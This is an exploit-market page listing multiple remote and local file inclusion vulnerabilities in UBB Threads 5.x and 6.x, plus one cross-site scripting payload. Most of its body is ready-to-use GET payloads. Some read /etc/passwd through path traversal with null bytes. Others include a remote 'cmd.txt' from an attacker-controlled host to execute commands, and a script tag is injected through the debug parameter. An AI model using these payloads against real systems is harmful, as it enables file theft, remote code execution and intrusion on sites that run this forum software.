[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

UBB Threads 5.x / 6.x Multiple Remote File Inclusion Vulnerabilities

Author
nukedx
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-459
Category
web applications
Date add
27-05-2006
Platform
unsorted
====================================================================
UBB Threads 5.x / 6.x Multiple Remote File Inclusion Vulnerabilities
====================================================================




UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities
This exploits works on UBBThreads 5.x,6.x
Succesful exploitation register_globals on
Version 6.x
GET -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=[FILE]
EXAMPLE -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=../../../../../etc/passwd%00
GET -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE]
EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt?
EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00
If php version < 4.1.0 or UBB version <= 5.x
GET -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE]
EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt?
EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00
XSS:
GET -> http://[site]/[ubbpath]/index.php?debug=[XSS]
EXAMPLE -> http://[site]/[ubbpath]/index.php?debug=<script>alert();</script>



#  0day.today [2024-11-16]  #